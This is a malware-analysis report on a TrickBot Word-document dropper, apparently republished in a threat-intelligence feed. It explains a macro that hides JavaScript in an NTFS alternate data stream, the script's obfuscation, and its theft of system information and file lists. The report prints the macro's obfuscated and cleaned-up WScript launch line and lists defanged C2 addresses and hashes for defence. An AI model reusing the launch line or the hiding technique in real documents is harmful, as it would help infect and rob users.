#1276012: Dissecting the 10k Lines of the new TrickBot Dropper

Description: TrickBot it is one of the best known Banking Trojan which has been infecting victims since 2016, it is considered a cyber-crime tool. But nowadays defining it a “Banking Trojan” is quite reductive: during the last years its modularity brought the malware to a higher level. In fact it can be considered a sort of malicious implant able to not only commit bank-related crimes, but also providing tools and mechanism for advanced attackers to penetrate within company networks. For instance, it has been used by several gangs to inoculate Ryuk ransomware within the core servers infrastructure, leading to severe outages and business interruption (e.g. the Bonfiglioli case).

In this report, we analyzed one of the recently weaponized Word documents spread by TrickBot operators all around the globe. Revealing an interesting dropper composed by several thousand highly obfuscated Lines of Code and abusing the so-called ADS (Alternate Data Stream).
Technical Analysis
Hash 07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6
Threat Dropper
Brief Description TrickBot document dropper
Ssdeep 1536:KakJo2opCGqSW6zY2HRH2bUoHH4OcAPHy7ls4Zk+Q7PhLQOmB:3oo2hNx2Z2b9nJcAa7lsmg5LQOmB

Table 1. Sample’s information

Once opened, the analyzed Word document reveals its nature through an initial, trivial, trick. The attacker simply used a white font to hide the malicious content from the unaware user (and from the endpoint agents). Just changing the font foreground color unveils some dense JavaScript code. This is code will be executed in the next stages of the infection chain, but before digging the JavaScript code, we’ll explore the macro code embedded into the malicious document.
Figure 1. Content of Word document

Figure 2. Unveiled content of Word document

The “Document_Open()” function (Figure 3) is automatically executed after the opening of the Word document. It retrieves the hidden document content through the “Print #StarOk, ActiveDocument.Content.Text” statement and writes a copy of it into the “%AppData%\Microsoft\Word\STARTUP\stati_stic.inf:com1” local file.
Figure 3. Macro code embedded in the malicious document

Exploring the folder “\Word\STARTUP” we noticed the “stati_stic.inf” file counts zero bytes. Actually, the dropper abused an old Windows File System feature, known as “Alternate Data Stream” (ADS), to hide its functional data in an unconventional stream. A known techniques, T1096 on Mitre Att&ck framework, can be simply used by concatenating the colon operator and the stream name to the filename during any writing or reading operation. So, we extracted the content of the stream through a simple Powershell command.
Figure 4. Use of Alternate Data Stream to hide the payload

The extracted payload is the initial Word document hidden content. The malicious control flow resumes with the “Document_Close()” function, in which the “StripAllHidden()” function is invoked. This routine deletes all the hidden information embedded into the document by the attacker, probably with the intent to hide any traces unintentionally embedded during the development phase. Its code has probably been borrowed from some public snippets such as the one included at the link.

After that, the macro code executes the data just written into the “com1” data stream. Since the stream contains JavaScript code, it will be executed through WScript utility using the following instructions:

CallByName CreateObject("wS" & Chri & "Ript.She" & Ja), "Run", VbMethod, Right(Right("WhiteGunPower", 8), Rule) & "sHe" & Ja & " wS" & Chri & "RipT" & GroundOn, 0

Which, after a little cleanup, becomes:

CallByName CreateObject("wScript.Shell"), "Run", VbMethod, “powershell wscript /e:jscript “c:\users\admin\appdata\roaming\microsoft\word\startup\stati_stic.inf:com1””, 0

The JavaScript Dropper

Now, let’s take a look at the JavaScript code. It is heavily obfuscated and uses randomization techniques to rename variable names and some comments, along with chunks of junk instructions resulting in a potentially low detection rate.
Figure 5. Example of the sample detection rate

At first glance, the attacker purpose seems fulfilled. The script is not easily readable and appears extremely complex: almost 10 thousand lines of code and over 1800 anonymous function declared in the code.
Figure 6. Content of the JavaScript file

But after a deeper look, two key functions, named “jnabron00” and “jnabron”, emerge. These functions are used to obfuscated every comprehensible character of the script. The first one, “jnabron00”, is illustrated in the following figure: it returns always zero value.
Figure 7. Function used to obfuscate the code

The other one, “jnabron”, is invoked with two parameters: an integer value (derived from some obfuscated operations) and a string which is always “Ch”.

jnabron(102, ‘Ch’)

The purpose of this function is now easy to understand: it returns the ASCII character associated with the integer value through the “String.fromCharCode” JS function. Obviously, once again, to obfuscate the function internals the attacker included many junk instructions, as reported in Figure 9.
Figure 8. Another function used to obfuscate the code

Using a combination of the two functions, the script unpack its real instructions, causing a tedious work to the analyst who has to understand the malicious intents of the script. As shown in the following figure, tens of code lines result in a single instruction containing the real value will be included in the final script.
Figure 9. Example of de-obfuscation process

After a de-obfuscation phase, some useful values are visible, such as the C2 address, the execution of a POST request, and the presence of Base64-encoded data.
Figure 10. C2 checkin code

Analyzing this hidden control flow we discover the first action to be performed is the gathering of particular system information. This is done through the WMI interface, specifying a particular WQL query and invoking the “ExecQuery” function to retrieve:

Info about Operating System
Info about machine
Info about current user
List of all active processes

Figure 11. Code used to extract information about system

These information are then sent to the command and control server during the check-in phase of the Javascript loader, along with the list of running processes.
Figure 12. Network traffic

Moreover, the script is able to gather a list of all files which have one of the extensions chosen by the attacker: PDF files, Office, Word and Excel documents. The result of this search is then written on a local file into the “%TEMP%” folder, and later uploaded to the attacker infrastructure.
Figure 13. Code to extract absolute paths from specific file types

Conclusion

TrickBot is one of the most active Banking Trojan today, it is considered to be part of Cyber Crime arsenal and it is still under development. The malware, first appeared in 2016, during the last years adds functionalities and exploit capabilities such as the infamous SMB Vulnerability (MS17-010) including EthernalBlue, EthernalRomance or EthernalChampion.

The analyzed dropper contains a highly obfuscated JavaScript code counting about 10 thousand Lines of Code. This new infection chain structure represents an increased threat to companies and users, it can achieve low detection rates enabling the unnoticed delivery of TrickBot payload, which can be really dangerous for its victims: just a few days, or even a few hours in some cases, of active infection could be enough to propagate advanced ransomware attacks all across the company IT infrastructure.
First Aid: IOCs:

URLs

hxxp://185[.]180[.]199[.]91/angola/mabutu.php
hxxp://212[.]80[.]216[.]142:443
hxxp://170[.]238[.]117[.]187:8082
hxxp://186[.]10[.]243[.]70:8082
hxxp://190[.]119[.]180[.]226:8082
hxxp://131[.]161[.]105[.]206:8082
hxxp://103[.]116[.]84[.]44:8082
hxxp://200[.]35[.]43[.]105:80
hxxp://103[.]194[.]90[.]242:80
hxxp://103[.]87[.]48[.]54:80
hxxp://190[.]152[.]125[.]162:80
hxxp://103[.]84[.]238[.]3:80
hxxp://192[.]3[.]105[.]136:443
hxxp://54[.]37[.]229[.]180:443
hxxp://192[.]227[.]142[.]155:443
hxxp://23[.]94[.]204[.]80:443
hxxp://5[.]230[.]26[.]41:443
hxxp://45[.]80[.]148[.]236:443
hxxp://185[.]20[.]184[.]74:80
hxxp://188[.]246[.]233[.]53:443
hxxp://92[.]38[.]149[.]49:443
hxxp://103[.]119[.]144[.]250:8082
hxxp://107[.]175[.]132[.]141:443
hxxp://141[.]255[.]167[.]125:443
hxxp://14[.]102[.]107[.]114:8082
hxxp://172[.]97[.]71[.]127:443
hxxp://181[.]115[.]156[.]218:80
hxxp://185[.]117[.]119[.]89:443
hxxp://185[.]20[.]184[.]74
hxxp://190[.]152[.]125[.]162:80
hxxp://192[.]210[.]152[.]173:443
hxxp://200[.]21[.]51[.]30:80
hxxp://212[.]80[.]216[.]228:443
hxxp://212[.]80[.]216[.]69
hxxp://31[.]202[.]132[.]5:443
hxxp://36[.]91[.]93[.]114:80
hxxp://75[.]183[.]130[.]158:8082
hxxp://96[.]36[.]253[.]146:8082
hxxp://97[.]87[.]127[.]198:80
hxxps://212[.]80[.]216[.]69:446

Hashes

07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6
731061cfff885671aa5799b5d850d67dc0c808e034ce32cb23e4e3ee3f7fcecf
e2dd0220ce32cfb8905add58f49c30bb118ec75455dc7c0221dae316c3e186bf
0242ebb681eb1b3dbaa751320dea56e31c5e52c8324a7de125a8144cc5270698
2476cd06d32adda664e79b424fe76a6b3c8d2afdb0160bae2e28dc7c38c1c60b
6a6530eb4938910794cbc07a96f03f29333a129c47ca800ea204f47490767af5
3789642a1dfd85c5f9fb0f5d15669e101987aa86f9140a9f736ff1c1f12fc772
9cfb441eb5c60ab1c90b58d4878543ee554ada2cceee98d6b867e73490d30fec
ec19424d113b33d5f68996122b825ef0f877d076974eaaf813c9ea92e97ab04e
ba2a255671d33677cab8d93531eb25c0b1f1ac3e3085b95365a017463662d787
8c353a3ab29d8f23aeb7491c6d8be3353008a952b347d3da6a3bf9f9c2e818c4
8cd75fa8650ebcf0a6200283e474a081cc0be57307e54909ee15f4d04621dde0
2df4672d7ff6de0bb7a15b20c7cc62daf2fdafe1f4a95f9062501e9079b09a5c
1e90a73793017720c9a020069ed1c87879174c19c3b619e5b78db8220a63e9b7
a5f773200ad3251c9cf43df2a8fb88e3e9aa63b62e21cca4fed896ee78778f27
083cb35a7064aa5589efc544ac1ed1b04ec0f89f0e60383fcb1b02b63f4117e9
844974a2d3266e1f9ba275520c0e8a5d176df69a0ccd5135b99facf798a5d209
503438480c715b3b7f2098f78fc33266f2374036b20c8fbd6f806eb4651aaed0
5c9f626665a5f6e91599df85f3a1ae07258b9c3b8fc72eff56082ce9cb2c4394
27f724fb9866b724e24d2950e395e29c59ba45b7acb1ce8875d7f90dd02c4749
8a4155d3f4b1e90f98c4eca76cf305c72abfac1e759c51e103b7e876fcf56cf1
22d9717e29331f658410081d481447b2e4b2619970c64956951e3128202e0985
5b193519c931e7673cffc325a1afe9e9f7396f46e9b8691a3b9fe730d4492054
2810afdda4ba5808722affa4e950679bc94950d85927096383580101693b3b48
398bfdae3412c4b4f2a50d3dcbe2cdb9896d317f9f657cd286535ca5110a936d
6729372d1d97326806dc4e9916be635fd5cfcb1516496b80b4541af91262abcd
02e79a8b9d962fbb161a16d3643d92533273db93ba1a67a1030de27dcb7cda82
844974a2d3266e1f9ba275520c0e8a5d176df69a0ccd5135b99facf798a5d209
fbd51d891687e2087f84e5472fc9e7afe67363c21392a6d1125ca9908840b449
9d47019d9ed24bd979d3484f62818c2e9daef0b2ea75b36899bb0c58c077bd02
ba2a255671d33677cab8d93531eb25c0b1f1ac3e3085b95365a017463662d787
8cd75fa8650ebcf0a6200283e474a081cc0be57307e54909ee15f4d04621dde0
ed2288ce8942b7509a9224c18db2e7e7f7a7e34d98acddb103fce7b8e725a2ce
184b50c5b538725c0073f637d9eb49bb2ccbe741aef306ae6a6f1e5e6444b445
5172e485a6eefacb1e47d839492201d0429e6860ecbaa8cf5fb8fb0e24bc795b
More info: https://blog.yoroi.company/research/dissecting-the-10k-lines-of-the-new-trickbot-dropper/

Date added Sept. 11, 2019, 10:26 p.m.
Source Yoroi
Subjects
  • All New Malware or Attack Alerts - New Reports / IOCs in
  • Banking Malware - New Reports in
  • Trickbot / Trik botnet / GOLD BLACKBURN - Banking Trojan